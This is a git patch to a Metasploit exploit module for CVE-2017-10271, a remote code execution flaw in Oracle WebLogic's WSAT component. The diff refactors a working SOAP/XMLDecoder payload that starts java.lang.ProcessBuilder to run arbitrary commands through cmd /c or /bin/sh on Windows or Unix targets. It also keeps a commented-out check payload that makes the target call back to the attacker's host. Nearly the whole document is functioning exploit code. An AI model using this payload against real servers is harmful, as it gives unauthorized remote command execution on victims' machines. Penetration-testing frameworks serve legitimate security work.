From 867b32415d1c73b8addae162f5194a1345069c03 Mon Sep 17 00:00:00 2001
From: Kevin Kirsche <Kev.Kirsche+GitHub@gmail.com>
Date: Sat, 6 Jan 2018 08:12:43 -0500
Subject: [PATCH] Fix feedback from wvu-r7

Fixes feedback from wvu-r7

- Consolidates payload to single method
- Replaces gsub! with standard encode method
- Note exploit discovery and proof of concept code used in authors (still seems weird to include the discovery as an author...)
- Change link
- Use `ARCH_CMD` instead of `[ARCH_CMD]`
- Remove Linux target as it's only Windows or Unix
- Remove timeout as I don't know how to pass it to `send_request_cgi`
---
 ...racle_weblogic_wsat_deserialization_rce.rb | 93 +++++++------------
 1 file changed, 33 insertions(+), 60 deletions(-)

diff --git a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
index 42218f8533..4b3a580558 100644
--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -16,13 +16,20 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description'    => %q(
             The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
         remote code execution vulnerability. Supported versions that are affected are
-        10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
+        10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
+        of ERPScan and Federico Dotta of Media Service.
         ),
         'License'        => MSF_LICENSE,
-        'Author'         => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'],
+        'Author'         => [
+          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
+          'Luffin', # Proof of Concept
+          'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
+        ],
         'References'     =>
           [
-            [ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'],
+            [ 'URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'],
+            [ 'POC', 'https://github.com/Luffin/CVE-2017-10271'],
+            [ 'Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'],
             [ 'CVE', '2017-10271']
           ],
         'Platform'      => %w{ win linux unix },
@@ -30,13 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets'        =>
           [
             [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
-            [ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ],
-            [ 'Linux Command payload', { 'Arch' => [ARCH_CMD], Platform => 'linux' } ]
+            [ 'Unix Command payload', { 'Arch' => ARCH_CMD, Platform => 'unix' } ],
           ],
-        'Payload'        =>
-        {
-          'DisableNops' => true
-        },
         'DisclosureDate' => "Oct 19 2017",
         # Note that this is by index, rather than name. It's generally easiest
         # just to put the default at the beginning of the list and skip this
@@ -47,24 +49,27 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
-      OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
       OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
     ])
   end
 
-  def cmd_payload
-    # Do NOT move the ampersand to a non-first index spot or else it'll replace aspects that we need
-    # This escaping makes sure that our payload works!
-    replacements = [ ['&', '&amp;'], ['"', '&quot;'], ["'", '&apos;'], ['<', '&lt;'], ['>', '&gt;'] ]
-    xml_prepared = payload.encoded
-    replacements.each do |r|
-      xml_prepared.gsub!(r[0], r[1])
+  def cmd_base
+    if target_platform == 'win'
+      return 'cmd'
+    else
+      return '/bin/sh'
     end
-
-    return xml_prepared
   end
 
-  def unix_payload
+  def cmd_opt
+    if target_platform == 'win'
+      return '/c'
+    else
+      return '-c'
+    end
+  end
+
+  def process_builder_payload
     # Generate a payload which will execute on a *nix machine using /bin/sh
     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
   <soapenv:Header>
@@ -73,40 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
         <object class="java.lang.ProcessBuilder">
           <array class="java.lang.String" length="3" >
             <void index="0">
-              <string>/bin/sh</string>
+              <string>#{cmd_base}</string>
             </void>
             <void index="1">
-              <string>-c</string>
+              <string>#{cmd_opt}</string>
             </void>
             <void index="2">
-              <string>#{cmd_payload}</string>
-            </void>
-          </array>
-          <void method="start"/>
-        </object>
-      </java>
-    </work:WorkContext>
-  </soapenv:Header>
-  <soapenv:Body/>
-</soapenv:Envelope>}
-  end
-
-  # Generate a payload which will execute on a Windows machine using cmd
-  def windows_payload
-    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
-  <soapenv:Header>
-    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
-      <java>
-        <object class="java.lang.ProcessBuilder">
-          <array class="java.lang.String" length="3" >
-            <void index="0">
-              <string>cmd</string>
-            </void>
-            <void index="1">
-              <string>/c</string>
-            </void>
-            <void index="2">
-              <string>#{cmd_payload}</string>
+              <string>#{payload.encoded.encode(xml: :text)}</string>
             </void>
           </array>
           <void method="start"/>
@@ -119,13 +97,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 # Not sure how to catch the response, so I'll leave this here in case someone can help
-#   def check_payload
+# This payload is used by sending to the RHOST and then you will receive an HTTP request
+# back from the target. If you got a request, it's vulnerable. If you didn't, it's not.
+#   def http_check_payload
 #     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 #   <soapenv:Header>
 #     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 #       <java version="1.8" class="java.beans.XMLDecoder">
 #         <object id="url" class="java.net.URL">
-#           <string>http://{lhost}:{lport}/{random_uri}</string>
+#           <string>http://#{datastore['LHOST']}:#{datastore['LPORT']}/#{random_uri}</string>
 #         </object>
 #         <object idref="url">
 #           <void id="stream" method = "openStream" />
@@ -142,14 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # followed by the fake return address and then the payload.
   #
   def exploit
-    target_os = datastore['TARGET'].to_i
-
-    xml_payload = ''
-    if target_os == 0
-      xml_payload = windows_payload
-    else
-      xml_payload = unix_payload
-    end
+    xml_payload = process_builder_payload
 
     send_request_cgi(
       'method'   => 'POST',